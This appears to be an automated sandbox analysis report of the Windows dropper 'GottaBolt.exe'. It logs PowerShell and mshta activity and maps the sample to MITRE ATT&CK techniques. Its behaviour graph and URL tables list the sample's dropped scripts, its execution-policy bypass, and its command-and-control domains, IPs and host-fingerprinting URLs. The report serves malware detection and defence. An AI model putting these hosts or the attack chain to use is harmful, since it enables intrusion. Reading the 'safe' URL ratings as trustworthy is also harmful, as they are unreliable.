          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\zfHvaMgyXTBAMdfoAHCG.txt VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Users\user\Desktop\GottaBolt.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation BiasJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
          Windows Management Instrumentation          		2
          Windows Service          		2
          Windows Service          		1
          Masquerading          		1
          Input Capture          		1
          System Time Discovery          		Remote Services1
          Email Collection          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          PowerShell          		1
          DLL Side-Loading          		12
          Process Injection          		1
          Disable or Modify Tools          		LSASS Memory111
          Security Software Discovery          		Remote Desktop Protocol1
          Input Capture          		1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		141
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin Shares1
          Archive Collected Data          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
          Process Injection          		NTDS141
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture3
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Timestomp          		Cached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSync123
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561030 Sample: GottaBolt.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 69 43 dfssinstitute.com 2->43 49 Suricata IDS alerts for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Yara detected Powershell download and execute 2->53 55 4 other signatures 2->55 8 GottaBolt.exe 23 6 2->8         started        13 mshta.exe 1 2->13         started        15 mshta.exe 2->15         started        17 mshta.exe 2->17         started        signatures3 process4 dnsIp5 47 dfssinstitute.com 77.91.73.101, 443, 49712, 49714 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 8->47 37 C:\Users\user\AppData\...\pIWRdrgc3.ps1, ASCII 8->37 dropped 39 C:\Users\user\AppData\...\pIWRdrgc2.ps1, ASCII 8->39 dropped 41 C:\Users\user\AppData\...\pIWRdrgc1.ps1, ASCII 8->41 dropped 61 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 8->61 63 Bypasses PowerShell execution policy 8->63 19 powershell.exe 37 8->19         started        22 powershell.exe 13->22         started        25 powershell.exe 15->25         started        27 powershell.exe 17->27         started        file6 signatures7 process8 dnsIp9 57 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 19->57 59 Loading BitLocker PowerShell Module 19->59 29 conhost.exe 19->29         started        45 172.86.76.228, 14000, 49786 M247GB United States 22->45 31 conhost.exe 22->31         started        33 conhost.exe 25->33         started        35 conhost.exe 27->35         started        signatures10 process11

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          GottaBolt.exe5%ReversingLabsWin64.Dropper.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://go.microsoft.c0%Avira URL Cloudsafe
          https://dfssinstitute.com/?AyBWQBCcuLOuwrlnujyH=zfHvaMgyXTBAMdfoAHCG.txt0%Avira URL Cloudsafe
          https://dfssinstitute.com/?rs=user0%Avira URL Cloudsafe
          http://crl.micro/pki/crl/productCerAut_2010-06-20%Avira URL Cloudsafe
          https://dfssinstitute.com/?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c70%Avira URL Cloudsafe
          https://dfssinstitute.com/0%Avira URL Cloudsafe
          https://dfssinstitute.com0%Avira URL Cloudsafe
          http://dfssinstitute.com0%Avira URL Cloudsafe
          https://dfssinstitute.com/?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3d0%Avira URL Cloudsafe
          http://www.apache.o_(0%Avira URL Cloudsafe
          http://ocsps.ssl.com0P0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          dfssinstitute.com
          		77.91.73.101
          		truetrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://dfssinstitute.com/?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7true
            • Avira URL Cloud: safe
            		unknown
            https://dfssinstitute.com/?AyBWQBCcuLOuwrlnujyH=zfHvaMgyXTBAMdfoAHCG.txttrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.1439564457.000001A94C296000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2741137716.00000176176F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2741137716.0000017617574000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664130053.000002AF574D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF48DD3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664130053.000002AF57616000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000011.00000002.1572405293.000002AF48A9D000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000000A.00000002.1412510517.000001A93C448000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://go.microsoft.cpowershell.exe, 00000016.00000002.2203282625.0000015A66C80000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://dfssinstitute.com/?rs=userGottaBolt.exe, 00000000.00000002.1510540109.0000026506698000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.0000026506641000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.0000026506775000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265067C7000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.000002650679E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265066F7000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.1572405293.000002AF48D79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF48A9D000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000A.00000002.1412510517.000001A93C448000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://dfssinstitute.com/GottaBolt.exefalse
                      • Avira URL Cloud: safe
                      		unknown
